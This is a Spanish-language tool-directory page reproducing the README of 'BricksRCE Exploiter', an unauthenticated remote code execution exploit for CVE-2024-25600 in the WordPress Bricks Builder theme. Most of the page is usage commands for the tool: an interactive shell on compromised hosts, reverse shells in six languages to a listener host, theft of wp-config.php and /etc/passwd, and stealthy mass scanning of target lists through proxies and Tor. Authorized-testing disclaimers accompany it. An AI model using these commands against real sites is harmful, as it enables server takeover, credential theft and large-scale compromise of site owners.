Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - Unauthenticated RCE exploit for WordPress Bricks Builder Theme. Advanced exploitation framework with interactive shell, reverse shells, file upload/download, async scanning, stealth mode, proxy support, and multi-threaded vulnerability scanning. For authorized security testing only. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
ReconnaissanceVulnerability ScannersExploitationShellcodeWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Payload Development
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

Ver Repositorio
1hace 1 mesAún no revisado

Acerca de

CVE-2024-25600 - Unauthenticated RCE exploit for WordPress Bricks Builder Theme. Advanced exploitation framework with interactive shell, reverse shells, file upload/download, async scanning, stealth mode, proxy support, and multi-threaded vulnerability scanning. For authorized security testing only.

Compartir

BricksRCE Exploiter

CVE-2024-25600 — WordPress Bricks Builder RCE sin autenticación

Python Version CVSS CVE License Platform

Herramienta de evaluación de seguridad autorizada para CVE-2024-25600
Autor: Sudeepa Wanigarathna · Herramienta: BricksRCE Exploiter v1.0
Script principal: cve-2024-25600.py

b

[!IMPORTANT] Solo uso autorizado. Esta herramienta es para investigación de seguridad, educación y pruebas de sistemas que posees o para los cuales tienes permiso explícito por escrito. El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el mal uso.


Tabla de Contenidos

  • Resumen
  • Detalles de la Vulnerabilidad
  • Características
  • Instalación
  • Inicio Rápido
  • Guía de Uso
  • Referencia de Comandos
  • Shell Interactivo
  • Salida y Registro
  • Solución de Problemas
  • Estructura del Repositorio
  • Historial de Versiones
  • Descargo de Responsabilidad
  • Autor y Créditos
  • Licencia

Resumen

CVE-2024-25600 es una vulnerabilidad crítica de ejecución remota de código sin autenticación en el tema de WordPress Bricks Builder. El manejo inadecuado de la entrada controlada por el usuario en el endpoint REST render_element permite que atacantes no autenticados ejecuten comandos arbitrarios de PHP/sistema en las instalaciones afectadas.

BricksRCE Exploiter (cve-2024-25600.py) es una herramienta de evaluación Python completa para profesionales de seguridad autorizados:

  • Detectar instalaciones vulnerables de Bricks Builder
  • Validar el impacto con ejecución controlada de comandos
  • Interactuar con hosts comprometidos mediante un shell interactivo
  • Escaneo masivo de listas de objetivos con trabajadores asíncronos/hilos
  • Exportar resultados estructurados para informes

Detalles de la Vulnerabilidad

Endpoints Afectados

EndpointMétodo
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

Resumen del Ataque

  1. Extraer un nonce de Bricks del código fuente de la página objetivo
  2. Enviar una solicitud render_element manipulada con una carga útil de elemento malicioso
  3. La evaluación de código del lado del servidor conduce a la ejecución arbitraria de comandos

Referencias

  • CVE-2024-25600 (MITRE)
  • Entrada NVD
  • Registro de cambios / Aviso de seguridad de Bricks Builder

Características

Capacidades Principales

Controles Operacionales

Informes

CapacidadDescripción
Exportación JSON / TXTGuardar resultados de escaneo y objetivos vulnerables
Historial de comandosRegistro opcional de comandos ejecutados
Registro en archivobricks_rce.log persistente más rutas de registro personalizadas

Instalación

Requisitos Previos

  • Python 3.8+
  • pip
  • Acceso de red al(los) objetivo(s) autorizado(s)

Configuración

root@kitploit:~
git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

Dependencias

root@kitploit:~
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # opcional — soporte para proxy SOCKS5

Inicio Rápido

Reemplace https://target.example con un objetivo de laboratorio o autorizado únicamente.

root@kitploit:~
# Shell interactivo
python3 cve-2024-25600.py -u https://target.example

# Comando único
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# Escaneo masivo
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# Detección de versión
python3 cve-2024-25600.py -u https://target.example --detect-version

# A través de proxy de Burp
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

Guía de Uso

Todos los ejemplos usan el script principal: cve-2024-25600.py

1. Mostrar ayuda

root@kitploit:~
python3 cve-2024-25600.py --help

2. Shell interactivo con un solo objetivo

Abre un shell interactivo RCE después de confirmar que el objetivo es vulnerable.

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example

Flujo de trabajo:

  1. Normalizar y validar la URL
  2. Extraer nonce de la página
  3. Verificar vulnerabilidad (a menos que se use --force)
  4. Entrar en un shell interactivo

3. Ejecutar un solo comando

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

Guardar la salida del comando en un archivo:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. Elegir tipo de carga útil

root@kitploit:~
# Carga útil predeterminada basada en excepción PHP
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# Carga útil basada en system()
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. Detectar versión de Bricks Builder

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version

Combinar con un comando:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. Extraer wp-config.php

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --extract-wp-config

Se guarda como wp-config_<objetivo>.txt si tiene éxito.

7. Shell inversos (solo laboratorio autorizado)

root@kitploit:~
# Terminal 1 — listener
nc -lvnp 4444

# Terminal 2 — reverse shell bash
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

Todos los tipos de shell inverso compatibles:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444

8. Modo forzado (omitir verificación de vulnerabilidad)

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"

9. Escaneo masivo desde un archivo

root@kitploit:~
# targets.txt — una URL por línea
python3 cve-2024-25600.py -f targets.txt

Con hilos, retardo, sigilo y salida JSON:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json

Escaneo síncrono (pool de hilos) en lugar de asíncrono:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt

Escaneo masivo silencioso:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt -q -o results.json

10. Selección de endpoint

root@kitploit:~
# Ambos endpoints (predeterminado)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# Solo /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json

# Solo /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route

11. Modo sigiloso

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --stealth \
  --delay 1.0 \
  --max-retries 5 \
  --timeout 20

12. User-Agent personalizado

root@kitploit:~
# UA personalizado
python3 cve-2024-25600.py -u https://target.example \
  --user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"

# Deshabilitar rotación aleatoria de UA
python3 cve-2024-25600.py -u https://target.example --no-random-ua

13. Soporte de proxy

root@kitploit:~
# Proxy HTTP (ej. Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

# Proxy SOCKS5
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050

# SOCKS5h (DNS a través de proxy / Tor)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050

14. Verificación SSL

root@kitploit:~
# Habilitar verificación de certificado SSL (deshabilitada por defecto)
python3 cve-2024-25600.py -u https://target.example --verify-ssl

15. Salida y registro

root@kitploit:~
# Guardar resultados de escaneo como JSON
python3 cve-2024-25600.py -f targets.txt -o results.json

# Guardar resultados de escaneo como TXT
python3 cve-2024-25600.py -f targets.txt -o results.txt

# Archivo de registro de aplicación personalizado
python3 cve-2024-25600.py -u https://target.example --log-file assessment.log -v

# Registrar comandos ejecutados
python3 cve-2024-25600.py -u https://target.example --command-log commands.log --cmd "id"

16. Modos verboso y silencioso

root@kitploit:~
# Registro verboso / depuración
python3 cve-2024-25600.py -u https://target.example -v

# Modo silencioso (salida mínima)
python3 cve-2024-25600.py -u https://target.example -q --cmd "id"

17. Ajuste de rendimiento

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 25 \
  --timeout 20 \
  --delay 0.2 \
  --max-retries 5 \
  -o results.json

18. Ejemplo de evaluación completa combinada

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --detect-version \
  --extract-wp-config \
  --stealth \
  --delay 0.8 \
  --timeout 20 \
  --max-retries 5 \
  --endpoint both \
  --proxy http://127.0.0.1:8080 \
  --log-file bricks_assessment.log \
  --command-log commands.log \
  -v

19. Comandos integrados del shell interactivo

Después de iniciar con -u (sin --cmd / --reverse-shell):

root@kitploit:~
Shell> whoami
Shell> id
Shell> pwd
Shell> ls -la
Shell> help
Shell> clear
Shell> download /etc/passwd
Shell> upload ./local.txt /tmp/remote.txt
Shell> php id
Shell> system uname -a
Shell> exit

Referencia de Comandos

Opciones de Objetivo

ArgumentoDescripción
-u, --urlURL de un solo objetivo
-f, --fileArchivo que contiene URLs objetivo (una por línea)

Opciones de Escaneo

Opciones de Sigilo

Opciones de Explotación

Opciones de Salida


Shell Interactivo

Al explotar un solo objetivo sin --cmd o --reverse-shell, se abre un shell interactivo:

root@kitploit:~
Shell> whoami
www-data

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell> help

Comandos Integrados

Características

  • Historial de comandos persistido en ~/.bricks_rce_history
  • Autocompletado para comandos comunes
  • Autosugerencias del historial (prompt-toolkit)

Salida y Registro

Consola

Paneles, barras de progreso y tablas de resultados potenciados por Rich:

root@kitploit:~
[*] Probando: https://target.example
[+] ¡https://target.example es vulnerable!
[+] Shell interactivo abierto exitosamente

Tabla de Resultados de Escaneo

Exportación JSON (-o results.json)

root@kitploit:~
{
  "timestamp": "2026-07-17T01:30:00",
  "version": "1.0.0",
  "config": {
    "threads": 10,
    "timeout": 15,
    "delay": 0.5
  },
  "stats": {
    "processed": 100,
    "vulnerable": 3,
    "failed": 97
  },
  "vulnerable_targets": [
    {
      "url": "https://target.example",
      "timestamp": "2026-07-17T01:31:12"
    }
  ]
}

Archivos de Registro

ArchivoPropósito
bricks_rce.logRegistro de aplicación por defecto (solo añadir)
--log-file RUTAManejador de registro personalizado adicional
--command-log RUTARegistro de auditoría de comandos ejecutados

Solución de Problemas

Flujo de Depuración

root@kitploit:~
# Verificación verbosa de un solo objetivo
python3 cve-2024-25600.py -u https://target.example --detect-version -v

# A través de Burp para inspección de solicitudes
python3 cve-2024-25600.py -u https://target.example \
  --proxy http://127.0.0.1:8080 -v --cmd "id"

# Preferir un endpoint específico
python3 cve-2024-25600.py -u https://target.example --endpoint json -v

Estructura del Repositorio

root@kitploit:~
exploit/
├── cve-2024-25600.py     # BricksRCE Exploiter (v1.0)
├── requirements.txt      # Dependencias Python
├── README.md             # Este archivo
├── bricks_rce.log        # Registro de ejecución (generado)
└── venv/                 # Virtualenv local (opcional, no incluido en el control de versiones)

Historial de Versiones

v1.0.0 — Lanzamiento Inicial

  • Detección y explotación de RCE sin autenticación para CVE-2024-25600
  • Extracción de nonce multimétodo
  • Shell interactivo con subida / descarga
  • Modos de comando único y reverse shell
  • Escaneo masivo asíncrono / con hilos
  • Detección de versión y extracción de wp-config
  • Modo sigiloso, rotación de UA, soporte de proxy
  • CLI enriquecida con exportación de resultados JSON/TXT

Descargo de Responsabilidad

Este proyecto se proporciona tal cual para investigación de seguridad defensiva y pruebas de penetración autorizadas.

Al usar este software, aceptas que:

  1. Solo atacarás sistemas que posees o para los cuales tienes autorización explícita para probar.
  2. Entiendes las leyes aplicables sobre abuso informático y protección de datos.
  3. El autor y los contribuyentes no son responsables de daños, pérdida de datos o consecuencias legales derivadas del mal uso.

Si descubres esta vulnerabilidad en entornos de producción que no posees, sigue prácticas de divulgación responsable y coordina con el propietario del sitio / el equipo de seguridad de Bricks Builder.

El acceso no autorizado a sistemas informáticos es un delito federal.


Autor y Créditos


Licencia

root@kitploit:~
Licencia MIT

Copyright (c) 2024–2026 Sudeepa Wanigarathna

Por la presente se concede permiso, libre de cargos, a cualquier persona que obtenga una copia
de este software y los archivos de documentación asociados (el "Software"), para tratar
el Software sin restricción, incluyendo sin limitación los derechos
de uso, copia, modificación, fusión, publicación, distribución, sublicencia y/o venta
de copias del Software, y para permitir a las personas a las que se les proporcione el
Software hacer lo mismo, sujeto a las siguientes condiciones:

El aviso de copyright anterior y este aviso de permiso se incluirán en todas las
copias o partes sustanciales del Software.

EL SOFTWARE SE PROPORCIONA "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO, EXPRESA O
IMPLÍCITA, INCLUYENDO PERO NO LIMITADO A LAS GARANTÍAS DE COMERCIABILIDAD,
IDONEIDAD PARA UN PROPÓSITO PARTICULAR Y NO INFRACCIÓN.

Soporte

  • Dale una estrella al repo si ayuda en tu investigación autorizada
  • Abre issues para errores, falsos positivos o mejoras en la detección
  • Las pull requests son bienvenidas para documentación y UX de laboratorio autorizado

Solo para pruebas de seguridad autorizadas.

Descargar herramienta
AtributoValor
ID CVECVE-2024-25600
CVSS9.8 (Crítico)
Vector de AtaqueRed — sin autenticación
ImpactoEjecución remota de código completa, compromiso de confidencialidad / integridad / disponibilidad
Producto AfectadoTema de WordPress Bricks Builder
Versiones AfectadasBricks ≤ 1.9.6 (corregido en 1.9.6.1+)
Tipo de VulnerabilidadEjecución Remota de Código sin Autenticación
CWECWE-94 (Control Inadecuado de la Generación de Código)
CapacidadDescripción
Detección de vulnerabilidadConfirma RCE mediante una sonda controlada basada en marcadores
Extracción de nonceDescubrimiento de nonce multimétodo (scripts, fuente de página, meta, REST)
Detección de versiónIdentifica la versión de Bricks Builder desde CSS / readme / REST
Shell interactivoREPL completo con historial, autocompletado y transferencia de archivos
Modo de comando únicoEjecuta un comando y sale (apto para scripting)
Ayudantes de reverse shellGenera shells inversos bash / nc / Python / PHP / Perl / Ruby
Extracción de wp-configIntenta localizar y leer wp-config.php
Escaneo masivoEscaneo multiobjetivo asíncrono o con hilos desde una lista de URLs
CapacidadDescripción
Limitación de velocidadRetardo configurable entre solicitudes
Lógica de reintentoRetroceso exponencial en tiempos de espera y errores de conexión
Rotación de User-AgentHuellas digitales de navegador aleatorias por solicitud
Modo sigilosoCabeceras Accept-Language / Accept-Encoding aleatorias
Soporte de proxyHTTP, HTTPS, SOCKS5 / SOCKS5h
Extremos dualesPreferir wp-json, rest_route o ambos
Modo forzadoOmitir verificación previa e intentar explotación directamente
CLI enriquecidaBarras de progreso, tablas y paneles coloreados con Rich
ArgumentoPredeterminadoDescripción
-t, --threads10Trabajadores concurrentes para escaneos masivos
--delay0.5Retardo entre solicitudes (segundos)
--timeout15Tiempo de espera de solicitud HTTP (segundos)
--max-retries3Intentos de reintento en caso de fallo
--forcedesactivadoOmitir verificación de vulnerabilidad
--syncdesactivadoUsar pool de hilos en lugar de asíncrono
ArgumentoDescripción
--user-agentCadena User-Agent personalizada
--no-random-uaDeshabilitar rotación de User-Agent
--proxyURL de proxy (http://, https://, socks5://, socks5h://)
--stealthHabilitar modo sigiloso (cabeceras aleatorias + retardos)
--endpointjson | rest_route | both (predeterminado: both)
ArgumentoDescripción
--cmdEjecutar un solo comando y salir
--payloadTipo de carga útil: php (predeterminado) o system
--reverse-shellTipo de shell: bash, nc, python, php, perl, ruby
--lhostHost del listener para reverse shell
--lportPuerto del listener para reverse shell
--extract-wp-configIntentar extraer wp-config.php
--detect-versionDetectar versión de Bricks Builder
--save-outputGuardar salida de comando único en un archivo
ArgumentoDescripción
-o, --outputArchivo de resultados (.json o .txt)
--log-fileRuta personalizada de registro detallado
--command-logRegistrar comandos ejecutados en un archivo
-v, --verboseRegistro de depuración
-q, --quietSalida mínima en consola
--verify-sslHabilitar verificación de certificado SSL (desactivado por defecto)
ComandoDescripción
exitSalir del shell
helpMostrar ayuda
clearLimpiar la pantalla
download [remoto]Descargar un archivo remoto (transferencia base64)
upload [local] [remoto]Subir un archivo local al objetivo
php [comando]Ejecutar mediante carga útil PHP (predeterminado)
system [comando]Ejecutar mediante carga útil system()
MétricaDescripción
Total ProcesadoURLs escaneadas
ExitosoConfirmado vulnerable
FallidoNo vulnerable / inalcanzable
Vulnerables EncontradosRecuento de objetivos RCE confirmados
Comandos EjecutadosTotal de ejecuciones de comandos RCE
Tiempo TranscurridoDuración del escaneo en tiempo real
SíntomaQué probar
Nonce no encontradoConfirmar que Bricks está activo; probar con -v; asegurar que la página principal carga
Objetivo no vulnerableVerificar Bricks ≤ 1.9.6; probar con --force; comprobar ambos endpoints
Tiempos de espera de conexiónAumentar --timeout / --max-retries; comprobar proxy
Límite de velocidad (429)Aumentar --delay; activar --stealth
Errores SSLPor defecto omite verificación; usar --verify-ssl solo cuando sea necesario
Inestabilidad asíncronaUsar --sync para escaneo con hilos
Fallo de reverse shellConfirmar que el listener está activo; probar tipos de shell alternativos (python, nc)
Salida de comando vacíaEl comando pudo haber tenido éxito sin stdout; probar echo test
wp-config no encontradoLas rutas varían según el host; usar shell interactivo con find / cat personalizado
RolNombre
Autor de la HerramientaSudeepa Wanigarathna
CVECVE-2024-25600
HerramientaBricksRCE Exploiter v1.0
Script Principalcve-2024-25600.py
LicenciaMIT